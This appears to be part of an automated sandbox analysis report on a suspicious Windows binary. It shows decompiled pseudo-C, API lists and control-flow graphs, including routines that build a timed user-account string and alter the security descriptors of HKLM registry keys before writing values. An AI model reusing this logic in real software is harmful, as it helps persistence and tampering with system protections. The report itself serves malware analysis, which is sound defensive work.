    												 *__eax = __edi;
    												__edi = _v84;
    												 *((intOrPtr*)(__eax + 4)) = _v84;
    												__edi = _v80;
    												 *((intOrPtr*)(__eax + 8)) = _v80;
    												__edi = _v76;
    												 *((intOrPtr*)(__eax + 0xc)) = _v76;
    												__eax = _v8;
    												__eax = _v12;
    												__ecx =  *((intOrPtr*)(__edx + 0x40));
    												__eax =  *((intOrPtr*)( *((intOrPtr*)(__edx + 0x40))))(__ecx, _v12, _v8, 6, 3,  &_v48);
    												__ecx =  &_v40;
    												__eax = E003C7CF0( &_v40);
    												__ecx =  &_v56;
    												__eax = E003C7CF0( &_v56);
    												__edx =  &_v36;
    												 *__esi( &_v36) =  &_v136;
    												__eax =  *__esi( &_v136);
    												__ecx =  &_v120;
    												__eax =  *__esi( &_v120);
    											}
    										}
    									}
    								}
    							} else {
    								__ecx = _v52;
    								__ecx = __esi;
    								__eax = E003E0580(__esi, __eflags, _v52);
    							}
    						}
    					}
    					__eax = _v48;
    					__eflags = __eax;
    					if(__eax != 0) {
    						__edx =  *__eax;
    						 *((intOrPtr*)(__edx + 8)) =  *((intOrPtr*)( *((intOrPtr*)(__edx + 8))))(__eax);
    					}
    					__eax = _v20;
    					__eflags = __eax;
    					if(__eax != 0) {
    						__ecx =  *__eax;
    						__edx =  *((intOrPtr*)(__ecx + 8));
    						__eax =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 8))))(__eax);
    					}
    					__eax = _v16;
    					__eflags = __eax;
    					if(__eax != 0) {
    						__eax = E003CBB40(__eax);
    					}
    					__eax = _v44;
    					_pop(__edi);
    					_pop(__esi);
    					_pop(__ebx);
    					__esp = __ebp;
    					_pop(__ebp);
    					return _v44;
    				}
    			}
















































































    APIs
      • Part of subcall function 003C5BD0: LookupAccountSidW.ADVAPI32(00000000,?,?,00000001,?,?,?), ref: 003C5C5B
      • Part of subcall function 003C5BD0: memcpy.MSVCRT ref: 003C5D01
      • Part of subcall function 003C5BD0: memcpy.MSVCRT ref: 003C5D26
      • Part of subcall function 003C5BD0: _time64.MSVCRT ref: 003C5DCC
      • Part of subcall function 003C5BD0: _localtime64.MSVCRT ref: 003C5DDD
      • Part of subcall function 003C5BD0: wcsftime.MSVCRT ref: 003C5E07
    • VariantInit.OLEAUT32(?), ref: 003C6306
    • VariantInit.OLEAUT32(?), ref: 003C631E
      • Part of subcall function 003E0290: SysAllocString.OLEAUT32(Jc<), ref: 003E02A3
      • Part of subcall function 003C13C0: ??2@YAPAXI@Z.MSVCRT ref: 003C13C9
      • Part of subcall function 003C13C0: SysAllocString.OLEAUT32(75CF3F3F), ref: 003C13EA
      • Part of subcall function 003C7CF0: InterlockedDecrement.KERNEL32(?), ref: 003C7CFE
      • Part of subcall function 003C7CF0: SysFreeString.OLEAUT32(00000000), ref: 003C7D13
      • Part of subcall function 003C7CF0: ??_V@YAXPAX@Z.MSVCRT ref: 003C7D21
      • Part of subcall function 003C7CF0: ??3@YAXPAX@Z.MSVCRT ref: 003C7D2A
    • VariantClear.OLEAUT32(?), ref: 003C642C
    • VariantClear.OLEAUT32(?), ref: 003C6432
    • VariantClear.OLEAUT32(?), ref: 003C6438
    • VariantInit.OLEAUT32(?), ref: 003C6479
    • VariantInit.OLEAUT32(?), ref: 003C6497
    • VariantInit.OLEAUT32(?), ref: 003C64B8
    • VariantClear.OLEAUT32(?), ref: 003C658F
    • VariantClear.OLEAUT32(?), ref: 003C6598
    • VariantClear.OLEAUT32(?), ref: 003C659E
      • Part of subcall function 003C6D30: GetTokenInformation.KERNELBASE(?,00000001,?,0000004C,?), ref: 003C6D8D
      • Part of subcall function 003E0580: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000001,?,?,80000001,?,003C62C2,?,?,?,?,003CFD54), ref: 003E05FF
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
      • Part of subcall function 003C32C0: VariantClear.OLEAUT32(?), ref: 003C3352
      • Part of subcall function 003C32C0: SysFreeString.OLEAUT32(003C62AB), ref: 003C337C
      • Part of subcall function 003C32C0: SysFreeString.OLEAUT32(?), ref: 003C33F6
      • Part of subcall function 003C32C0: VariantClear.OLEAUT32(?), ref: 003C3495
      • Part of subcall function 003C32C0: SysFreeString.OLEAUT32(?), ref: 003C34BB

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 121 3c5bd0-3c5c05 122 3c5c68-3c5c8c 121->122 123 3c5c07-3c5c2a 121->123 127 3c5ef2-3c5ef7 122->127 134 3c5c92-3c5cb5 122->134 126 3c5c30-3c5c3f 123->126 123->127 128 3c5c42-3c5c5f LookupAccountSidW 126->128 130 3c5ef9-3c5eff call 3cbb40 127->130 131 3c5f02-3c5f07 127->131 132 3c5cd5-3c5cda 128->132 133 3c5c61-3c5c67 128->133 130->131 136 3c5f09-3c5f0f 131->136 137 3c5f17-3c5f1c 131->137 139 3c5cdc-3c5ce1 132->139 140 3c5d37-3c5d3a 132->140 134->127 148 3c5cbb-3c5cd0 134->148 136->137 141 3c5f2d-3c5f35 137->141 142 3c5f1e-3c5f25 137->142 139->140 146 3c5ce3-3c5d33 call 3d1d90 memcpy * 2 139->146 143 3c5d3c-3c5d3e 140->143 144 3c5d40 140->144 142->141 147 3c5d42-3c5d79 call 3c1c70 call 3d1d90 call 3c9090 * 2 143->147 144->147 146->140 159 3c5daf-3c5df2 call 3c9090 * 2 _time64 _localtime64 call 3c9090 147->159 160 3c5d7b-3c5d91 call 3c9090 147->160 148->128 172 3c5df7-3c5e1e wcsftime 159->172 166 3c5da4-3c5dac call 3c9090 160->166 167 3c5d93-3c5da2 160->167 166->159 167->166 167->167 173 3c5e34-3c5e4d call 3c9090 172->173 174 3c5e20 172->174 178 3c5e4f 173->178 179 3c5e61-3c5e65 173->179 175 3c5e23-3c5e32 174->175 175->173 175->175 180 3c5e50-3c5e5f 178->180 181 3c5e9f-3c5ebf call 3c9090 call 3c8030 179->181 182 3c5e67-3c5e7d call 3c9090 179->182 180->179 180->180 194 3c5ec1-3c5ed0 181->194 195 3c5ed2-3c5ef0 call 3c9090 call 3cbb40 181->195 187 3c5e7f 182->187 188 3c5e91-3c5e9c call 3c9090 182->188 190 3c5e80-3c5e8f 187->190 188->181 190->188 190->190 194->194 194->195 195->127
    C-Code - Quality: 69%
    			E003C5BD0(intOrPtr* _a4, signed int _a8) {
    				long _v8;
    				signed int _v12;
    				short _v16;
    				char _v20;
    				void* _v24;
    				signed short* _v28;
    				char _v32;
    				signed short* _v36;
    				char _v44;
    				tm* _v48;
    				char _v52;
    				intOrPtr _v56;
    				char _v60;
    				void* _v120;
    				void* _v196;
    				void _v708;
    				void _v1220;
    				long _v1732;
    				intOrPtr _t98;
    				signed int _t99;
    				signed short* _t100;
    				void* _t101;
    				intOrPtr _t102;
    				intOrPtr _t106;
    				signed int _t111;
    				void* _t113;
    				int _t114;
    				intOrPtr _t116;
    				signed int _t117;
    				signed int _t120;
    				tm* _t121;
    				signed short _t125;
    				signed int _t126;
    				signed int _t127;
    				signed int _t131;
    				signed int _t135;
    				signed int _t136;
    				signed int _t137;
    				signed int _t139;
    				signed int _t141;
    				void* _t154;
    				intOrPtr _t155;
    				long _t162;
    				signed short* _t165;
    				signed short* _t166;
    				void* _t168;
    				void* _t169;
    				intOrPtr _t177;
    				intOrPtr _t179;
    				intOrPtr _t190;
    				WCHAR* _t192;
    				wchar_t* _t193;
    				signed short* _t194;
    				void* _t195;
    				intOrPtr _t196;
    				void* _t197;
    				void* _t198;
    				void* _t199;
    				signed int* _t200;
    				signed int* _t201;
    				signed int* _t202;
    				signed int* _t203;
    				signed int* _t204;
    				short* _t205;
    				void* _t206;
    				void* _t207;
    				void* _t208;
    				void* _t211;
    				void* _t213;
    				void* _t214;
    				void* _t215;
    				void* _t216;
    
    				_t192 = 0;
    				_t195 = 0;
    				_t154 = 0;
    				_v32 = 0;
    				_v60 = 0;
    				_v20 = 0;
    				_v16 = 0x500;
    				_v24 = 0;
    				_v28 = 0;
    				_v8 = 0x200;
    				_v12 = 0x200;
    				if(_a8 == 0) {
    					_t155 =  *0x3e8628; // 0x622508
    					_t98 =  *0x3e8628; // 0x622508
    					_t99 =  *((intOrPtr*)( *((intOrPtr*)(_t98 + 0x150))))( *((intOrPtr*)( *((intOrPtr*)(_t155 + 0x100))))(8,  &_v32));
    					__eflags = _t99;
    					if(_t99 == 0) {
    						goto L32;
    					} else {
    						_t179 =  *0x3e8628; // 0x622508
    						_t111 =  *((intOrPtr*)( *((intOrPtr*)(_t179 + 0x13c))))(_v32, 1,  &_v196, 0x4c,  &_v60);
    						__eflags = _t111;
    						if(_t111 == 0) {
    							goto L32;
    						} else {
    							_push( &_v52);
    							_push( &_v12);
    							_push( &_v708);
    							_t113 = _v196;
    							goto L3;
    						}
    					}
    				} else {
    					_t190 =  *0x3e8628; // 0x622508
    					_push( &_v24);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(0x12);
    					_push(1);
    					_push( &_v20);
    					if( *((intOrPtr*)( *((intOrPtr*)(_t190 + 0x158))))() == 0) {
    						L32:
    						_t100 = _v28;
    						__eflags = _t100 - _t192;
    						if(_t100 != _t192) {
    							E003CBB40(_t100);
    						}
    						_t101 = _v24;
    						__eflags = _t101 - _t192;
    						if(_t101 != _t192) {
    							_t106 =  *0x3e8628; // 0x622508
    							 *((intOrPtr*)( *((intOrPtr*)(_t106 + 0x154))))(_t101);
    						}
    						_t102 = _v32;
    						__eflags = _t102 - _t192;
    						if(_t102 != _t192) {
    							_t177 =  *0x3e8628; // 0x622508
    							 *((intOrPtr*)( *((intOrPtr*)(_t177 + 0xf8))))(_t102);
    						}
    						return _t195;
    					} else {
    						_push( &_v52);
    						_push( &_v12);
    						_push( &_v708);
    						_t113 = _v24;
    						L3:
    						_t114 = LookupAccountSidW(_t192, _t113,  &_v1220,  &_v8, ??, ??, ??); // executed
    						if(_t114 != 0) {
    							_t162 = _v8;
    							__eflags = _t162 - _t192;
    							if(_t162 > _t192) {
    								_t141 = _v12;
    								__eflags = _t141 - _t192;
    								if(_t141 > _t192) {
    									_t154 = E003D1D90(_t141 + _t162 + _t141 + _t162 + 4, _t192);
    									memcpy(_t154,  &_v708, _v12 + _v12);
    									_t205 = _t154 + _v12 * 2;
    									 *_t205 = 0x5c;
    									_t206 = _t205 + 2;
    									memcpy(_t206,  &_v1220, _v8 + _v8);
    									_t208 = _t208 + 0x20;
    									__eflags = 0;
    									 *((short*)(_t206 + _v8 * 2)) = 0;
    								}
    							}
    							__eflags = _a8 - _t192;
    							if(__eflags == 0) {
    								_push(0x1e);
    							} else {
    								_push(0x1d);
    							}
    							_v36 = E003C1C70(__eflags);
    							_t116 = E003D1D90(0x7d00, _t192); // executed
    							_t196 = _t116;
    							_v56 = _t196;
    							_t117 = E003C9090(__eflags, _t196, 0x16);
    							_t211 = _t208 + 0x14;
    							_t197 = _t196 + _t117 * 2;
    							_t198 = _t197 + E003C9090(__eflags, _t197, 0x1b) * 2;
    							__eflags = _a8 - _t192;
    							if(__eflags == 0) {
    								_t204 = _t198 + E003C9090(__eflags, _t198, 0x1f) * 2;
    								_t139 =  *_t154 & 0x0000ffff;
    								_t211 = _t211 + 0x10;
    								_t169 = _t154;
    								__eflags = _t139 - _t192;
    								while(__eflags != 0) {
    									_t169 = _t169 + 2;
    									 *_t204 = _t139;
    									_t139 =  *_t169 & 0x0000ffff;
    									_t204 =  &(_t204[0]);
    									__eflags = _t139 - _t192;
    								}
    								_t198 = _t204 + E003C9090(__eflags, _t204, 0x20) * 2;
    							}
    							_t199 = _t198 + E003C9090(__eflags, _t198, 0x1c) * 2;
    							_t120 = E003C9090(__eflags, _t199, 0x17);
    							_t200 = _t199 + _t120 * 2;
    							__imp___time64( &_v44);
    							_v44 = _v44 + 0x3c;
    							_t121 =  &_v44;
    							asm("adc [ebp-0x24], edi"); // executed
    							__imp___localtime64(_t121); // executed
    							_v48 = _t121;
    							_t193 =  &_v120;
    							E003C9090(__eflags,  &_v1732, 0x21);
    							 *((short*)(_t207 + wcsftime(_t193, 0x1a,  &_v1732, _v48) * 2 - 0x74)) = 0;
    							_t125 = _v120;
    							_t213 = _t211 + 0x38;
    							__eflags = _t125;
    							if(__eflags != 0) {
    								_t137 = _t125 & 0x0000ffff;
    								do {
    									_t193 =  &(_t193[0]);
    									 *_t200 = _t137;
    									_t137 =  *_t193 & 0x0000ffff;
    									_t200 =  &(_t200[0]);
    									__eflags = _t137;
    								} while (__eflags != 0);
    							}
    							_t126 = E003C9090(__eflags, _t200, 0x18);
    							_t194 = _v36;
    							_t201 = _t200 + _t126 * 2;
    							_t127 =  *_t194 & 0x0000ffff;
    							_t214 = _t213 + 8;
    							_t165 = _t194;
    							__eflags = _t127;
    							while(_t127 != 0) {
    								_t165 =  &(_t165[1]);
    								 *_t201 = _t127;
    								_t127 =  *_t165 & 0x0000ffff;
    								_t201 =  &(_t201[0]);
    								__eflags = _t127;
    							}
    							__eflags = _a8;
    							if(__eflags == 0) {
    								_t203 = _t201 + E003C9090(__eflags, _t201, 0x1f) * 2;
    								_t135 =  *_t154 & 0x0000ffff;
    								_t216 = _t214 + 8;
    								_t168 = _t154;
    								__eflags = _t135;
    								while(__eflags != 0) {
    									_t168 = _t168 + 2;
    									 *_t203 = _t135;
    									_t135 =  *_t168 & 0x0000ffff;
    									_t203 =  &(_t203[0]);
    									__eflags = _t135;
    								}
    								_t136 = E003C9090(__eflags, _t203, 0x20);
    								_t214 = _t216 + 8;
    								_t201 = _t203 + _t136 * 2;
    							}
    							_t202 = _t201 + E003C9090(__eflags, _t201, 0x19) * 2;
    							E003C8030( &_v28);
    							_t166 = _v28;
    							_t131 =  *_t166 & 0x0000ffff;
    							_t215 = _t214 + 0xc;
    							__eflags = _t131;
    							while(__eflags != 0) {
    								_t166 =  &(_t166[1]);
    								 *_t202 = _t131;
    								_t131 =  *_t166 & 0x0000ffff;
    								_t202 =  &(_t202[0]);
    								__eflags = _t131;
    							}
    							E003C9090(__eflags, _t202, 0x1a);
    							 *_a4 = _v56;
    							_t195 = 1;
    							E003CBB40(_t194);
    							_t208 = _t215 + 0xc;
    							_t192 = 0;
    							__eflags = 0;
    							goto L32;
    						} else {
    							return _t114;
    						}
    					}
    				}
    			}

    APIs
    • LookupAccountSidW.ADVAPI32(00000000,?,?,00000001,?,?,?), ref: 003C5C5B
    • memcpy.MSVCRT ref: 003C5D01
    • memcpy.MSVCRT ref: 003C5D26
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
    • _time64.MSVCRT ref: 003C5DCC
    • _localtime64.MSVCRT ref: 003C5DDD
    • wcsftime.MSVCRT ref: 003C5E07
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 341 3e0640-3e0655 342 3e065c-3e068c StrChrW RegOpenKeyExW 341->342 343 3e0657 341->343 344 3e0782-3e0787 342->344 345 3e0692-3e06b3 GetSecurityInfo 342->345 343->342 346 3e076e-3e0780 345->346 347 3e06b9-3e06f5 call 3c80a0 StrChrW RegOpenKeyExW 345->347 346->344 351 3e0718-3e0738 SetNamedSecurityInfoW 347->351 352 3e06f7-3e0716 RegSetValueExW 347->352 353 3e075c-3e076b 351->353 354 3e073a-3e075a 351->354 352->351 353->346 354->353
    C-Code - Quality: 100%
    			E003E0640(WCHAR* __ebx, short* _a4, char _a8) {
    				void* _v8;
    				void* _v12;
    				char _v16;
    				long _t30;
    				intOrPtr _t31;
    				int _t32;
    				char _t40;
    				intOrPtr _t41;
    				int _t42;
    				WCHAR* _t50;
    				intOrPtr _t54;
    				intOrPtr _t57;
    				intOrPtr _t58;
    				int _t73;
    				signed int _t74;
    
    				_t50 = __ebx;
    				_t74 = 0;
    				_v12 = 0;
    				_v8 = 0;
    				if(_a8 != 0) {
    					_t74 = 0x100;
    				}
    				_t30 = RegOpenKeyExW(0x80000002,  &((StrChrW(_t50, 0x5c))[1]), 0, _t74 | 0x00020019,  &_v12); // executed
    				if(_t30 == 0) {
    					_t31 =  *0x3e8628; // 0x622508
    					_t32 =  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0x1ac))))(_v12, 4, 4, _t30, _t30,  &_a8, _t30, _t30); // executed
    					_t73 = _t32;
    					if(_t73 == 0) {
    						E003C80A0(_v12, 4); // executed
    						_t40 = RegOpenKeyExW(0x80000002,  &((StrChrW(_t50, 0x5c))[1]), _t73, _t74 | 0x0002001f,  &_v8); // executed
    						if(_t40 == 0) {
    							_v16 = _t40;
    							RegSetValueExW(_v8, _a4, _t73, 4,  &_v16, 4); // executed
    						}
    						_t41 =  *0x3e8628; // 0x622508
    						_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x1a4))))(_t50, 4, 4, 0, 0, _a8, 0); // executed
    						_t73 = _t42;
    						if(_t73 != 0) {
    							_t58 =  *0x3e8628; // 0x622508
    							_t73 =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0x1a8))))(_v8, 4, 4, 0, 0, _a8, 0);
    						}
    						_t57 =  *0x3e8628; // 0x622508
    						 *((intOrPtr*)( *((intOrPtr*)(_t57 + 0x198))))(_v8);
    					}
    					_t54 =  *0x3e8628; // 0x622508
    					 *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x198))))(_v12);
    					return _t73;
    				}
    				return _t30;
    			}

    APIs
    • StrChrW.SHLWAPI(?,0000005C), ref: 003E0673
    • RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 003E0688
    • GetSecurityInfo.ADVAPI32(?,00000004,00000004,00000000,00000000,00000000,00000000,00000000), ref: 003E06AD
      • Part of subcall function 003C80A0: memset.MSVCRT ref: 003C8128
      • Part of subcall function 003C80A0: SetSecurityInfo.ADVAPI32(?,?,00000004,00000000,00000000,?,00000000), ref: 003C81A5
    • StrChrW.SHLWAPI(?,0000005C), ref: 003E06D6
    • RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 003E06F1
    • RegSetValueExW.KERNEL32(?,?,00000000,00000004,?,00000004), ref: 003E0716
    • SetNamedSecurityInfoW.ADVAPI32(?,00000004,00000004,00000000,00000000,?,00000000), ref: 003E0732
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 356 3e2480-3e2482 357 3e248c-3e2497 Sleep 356->357 358 3e2484-3e248a 356->358 360 3e2473-3e247e InterlockedCompareExchange 357->360 359 3e249c-3e24a3 358->359 362 3e24af-3e24d8 359->362 363 3e24a5-3e24ad _amsg_exit 359->363 360->356 361 3e2499-3e249b 360->361 361->359 365 3e24de-3e24e5 362->365 363->365 366 3e24e7-3e24f8 _initterm 365->366 367 3e2502-3e2505 365->367 366->367 368 3e250f-3e2515 367->368 369 3e2507-3e2509 InterlockedExchange 367->369 370 3e2517-3e2524 call 3c3d60 368->370 371 3e2530-3e2537 368->371 369->368 370->371 379 3e2526-3e2529 370->379 373 3e253d 371->373 374 3e2602-3e2609 371->374 377 3e253f-3e2549 373->377 375 3e260e-3e2613 call 3e2829 374->375 380 3e259a-3e259e 377->380 381 3e254b-3e254e 377->381 379->371 383 3e25ab-3e25ad 380->383 384 3e25a0-3e25a8 380->384 385 3e2555-3e255b 381->385 386 3e2550-3e2553 381->386 383->377 384->383 387 3e255d-3e2561 385->387 388 3e256a-3e256e 385->388 386->380 386->385 387->388 389 3e2563-3e2568 387->389 390 3e2576-3e2578 388->390 391 3e2570-3e2574 388->391 389->385 392 3e2579-3e2581 call 3cfbf0 390->392 391->392 394 3e2586-3e2591 392->394 395 3e25df-3e25e5 394->395 396 3e2593-3e2594 exit 394->396 397 3e25ed-3e25f9 395->397 398 3e25e7 _cexit 395->398 396->380 397->375 398->397
    C-Code - Quality: 54%
    			E003E2480(void* __eax, long __ebx, LONG* __edi, long __esi) {
    				signed int _t18;
    				signed int _t19;
    				signed int _t20;
    				int* _t21;
    				int _t22;
    				int _t24;
    				signed int _t31;
    				long _t32;
    				signed int _t33;
    				signed int _t36;
    				LONG* _t43;
    				signed int _t46;
    				void* _t48;
    				void* _t54;
    
    				L0:
    				while(1) {
    					L0:
    					_t43 = __edi;
    					_t32 = __ebx;
    					if(__eax == __esi) {
    						break;
    					}
    					L3:
    					Sleep(0x3e8);
    					if(InterlockedCompareExchange(__edi, __esi, __ebx) == __ebx) {
    						L4:
    						_t46 = 1;
    						__eflags = 1;
    					} else {
    						continue;
    					}
    					L5:
    					_t18 =  *0x3e8c38; // 0x2
    					if(_t18 != _t46) {
    						L7:
    						_t19 =  *0x3e8c38; // 0x2
    						__eflags = _t19;
    						if(__eflags != 0) {
    							L11:
    							 *0x3e865c = _t46;
    							goto L12;
    						} else {
    							L8:
    							 *0x3e8c38 = _t46;
    							_t31 = E003D1B59(0x3e3240, 0x3e324c); // executed
    							__eflags = _t31;
    							if(__eflags == 0) {
    								goto L12;
    							} else {
    								L10:
    								goto L38;
    							}
    						}
    					} else {
    						L6:
    						_push(0x1f);
    						L003CF19C();
    						L12:
    						_t20 =  *0x3e8c38; // 0x2
    						if(_t20 == _t46) {
    							_push(0x3e323c);
    							_push(0x3e3234); // executed
    							L003C27A8(); // executed
    							 *0x3e8c38 = 2;
    						}
    						if( *((intOrPtr*)(_t48 - 0x20)) == _t32) {
    							InterlockedExchange(_t43, _t32);
    						}
    						_t54 =  *0x3e8c40 - _t32; // 0x0
    						if(_t54 != 0) {
    							_push(0x3e8c40);
    							if(E003C3D60(_t32, _t43, _t46, _t54) != 0) {
    								 *0x3e8c40(_t32, 2, _t32);
    							}
    						}
    						_t21 = __imp___wcmdln;
    						if( *_t21 == _t32) {
    							L38:
    							 *((intOrPtr*)(_t48 - 4)) = 0xfffffffe;
    							_t22 = 0xff;
    						} else {
    							L20:
    							_t24 =  *_t21;
    							while(1) {
    								L21:
    								 *(_t48 - 0x24) = _t24;
    								_t33 =  *_t24 & 0x0000ffff;
    								if(_t33 > 0x20 || _t33 != _t32 &&  *(_t48 - 0x1c) != _t32) {
    									goto L32;
    								} else {
    									goto L24;
    								}
    								while(1) {
    									L24:
    									_t36 =  *_t24 & 0x0000ffff;
    									if(_t36 == _t32 || _t36 > 0x20) {
    										break;
    									}
    									L26:
    									_t24 = _t24 + 2;
    									 *(_t48 - 0x24) = _t24;
    								}
    								L27:
    								__eflags =  *(_t48 - 0x40) & 0x00000001;
    								if(( *(_t48 - 0x40) & 0x00000001) == 0) {
    									_t33 = 0xa;
    								} else {
    									_t33 =  *(_t48 - 0x3c) & 0x0000ffff;
    								}
    								_push(_t33);
    								_push(_t24);
    								_push(_t32);
    								_push(0x3c0000); // executed
    								L003CFBF0(); // executed
    								 *0x3e8658 = _t24;
    								__eflags =  *0x3e864c - _t32; // 0x0
    								if(__eflags == 0) {
    									L31:
    									exit(_t24);
    									goto L32;
    								}
    								L35:
    								__eflags =  *0x3e865c - _t32; // 0x0
    								if(__eflags == 0) {
    									__imp___cexit();
    								}
    								L37:
    								 *((intOrPtr*)(_t48 - 4)) = 0xfffffffe;
    								_t22 =  *0x3e8658; // 0x0
    								goto L39;
    								L32:
    								__eflags = _t33 - 0x22;
    								if(_t33 == 0x22) {
    									__eflags =  *(_t48 - 0x1c) - _t32;
    									_t12 =  *(_t48 - 0x1c) == _t32;
    									__eflags = _t12;
    									 *(_t48 - 0x1c) = 0 | _t12;
    								}
    								_t24 = _t24 + 2;
    							}
    						}
    					}
    					L39:
    					return E003E2829(_t22);
    					L40:
    				}
    				L2:
    				_t46 = 1;
    				 *((intOrPtr*)(_t48 - 0x20)) = 1;
    				goto L5;
    			}

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 399 3cfee0-3cfefb call 3c94d0 402 3cfefd-3cff10 399->402 403 3cff15-3cff3e _time64 399->403 410 3d0374-3d038a 402->410 404 3cffac-3cffc7 call 3d1b80 403->404 405 3cff40 403->405 414 3cffc9-3cffcc 404->414 415 3cfff6-3d0012 404->415 408 3cff49-3cff62 call 3cd890 405->408 409 3cff42-3cff47 405->409 420 3cff64-3cff67 408->420 421 3cff90-3cffa8 408->421 409->404 409->408 410->399 413 3d0390-3d03c4 call 3e0a40 call 3e0d30 410->413 454 3d03cc-3d03ef call 3c1700 call 3cf850 call 3cc930 413->454 418 3cffde-3cfff1 414->418 419 3cffce-3cffdb call 3cc870 414->419 422 3d0014 415->422 423 3d0041-3d005c call 3c42a0 call 3d12c0 415->423 418->410 419->418 429 3cff79-3cff8b 420->429 430 3cff69-3cff76 call 3cc870 420->430 421->404 424 3d001d-3d0035 call 3cac90 422->424 425 3d0016-3d001b 422->425 447 3d005e-3d008f call 3c9090 * 2 423->447 448 3d0091 423->448 424->410 443 3d003b-3d003e 424->443 425->423 425->424 442 3d0372 429->442 430->429 442->410 443->423 467 3d00f7-3d00ff call 3c5a10 447->467 449 3d00c6-3d00f6 call 3c9090 * 2 448->449 450 3d0093-3d00c4 call 3c9090 * 2 448->450 449->467 450->467 478 3d04eb-3d04f6 call 3c9480 call 3c7e10 ExitProcess 454->478 479 3d03f5-3d0440 call 3c8030 call 3d1d90 454->479 472 3d0102-3d0119 _time64 467->472 474 3d011b-3d0128 472->474 475 3d0133-3d0164 call 3c36e0 472->475 480 3d016b-3d0178 474->480 481 3d012a 474->481 475->480 487 3d0166 475->487 514 3d0495-3d04e9 call 3cbb40 479->514 515 3d0442-3d044c 479->515 485 3d017a 480->485 486 3d01d3-3d01dc 480->486 481->475 482 3d012c-3d0131 481->482 482->475 482->480 489 3d017c-3d0181 485->489 490 3d0183-3d01a0 485->490 492 3d028f-3d029c call 3c9890 486->492 493 3d01e2 486->493 487->480 489->486 489->490 490->486 498 3d01a2 490->498 492->442 507 3d02a2-3d02b5 call 3c5a10 492->507 494 3d01e4-3d01ea 493->494 495 3d01f0-3d020a call 3cf2d0 call 3c99a0 493->495 494->492 494->495 520 3d020c-3d023d call 3c9090 * 2 495->520 521 3d023f-3d026f call 3c9090 * 2 495->521 503 3d01ab-3d01cd call 3c1fe0 498->503 504 3d01a4-3d01a9 498->504 503->486 518 3d0344-3d035b call 3d0ad0 503->518 504->486 504->503 507->442 523 3d02bb-3d02cc call 3c7560 507->523 514->478 519 3d0450-3d046c 515->519 518->454 532 3d035d-3d0367 518->532 535 3d046e-3d0483 519->535 545 3d0270-3d028c call 3c5a10 call 3cbb40 _time64 520->545 521->545 539 3d0369-3d0370 523->539 540 3d02d2-3d02d9 523->540 532->442 548 3d0485-3d0490 535->548 549 3d0493 535->549 539->442 539->454 540->454 544 3d02df-3d02eb 540->544 546 3d02ed-3d02fa 544->546 547 3d02fc-3d0301 544->547 545->492 553 3d0303-3d030c 546->553 547->553 554 3d0310-3d0318 547->554 548->549 549->514 553->554 557 3d031a-3d0330 554->557 558 3d0332-3d033c 554->558 557->554 557->558 558->472 560 3d0342 558->560 560->442
    C-Code - Quality: 47%
    			E003CFEE0() {
    				void* _t142;
    				intOrPtr _t144;
    				signed int* _t145;
    				signed int* _t147;
    				signed int* _t150;
    				void* _t152;
    				signed int* _t156;
    				intOrPtr _t157;
    				signed int* _t159;
    				signed int* _t161;
    				signed int* _t162;
    				intOrPtr _t163;
    				void* _t165;
    				signed int* _t171;
    				signed int* _t172;
    				signed int* _t180;
    				signed int* _t189;
    				signed int _t191;
    				signed int* _t192;
    				signed int* _t196;
    				signed int* _t198;
    				intOrPtr _t204;
    				signed int* _t210;
    				signed int* _t212;
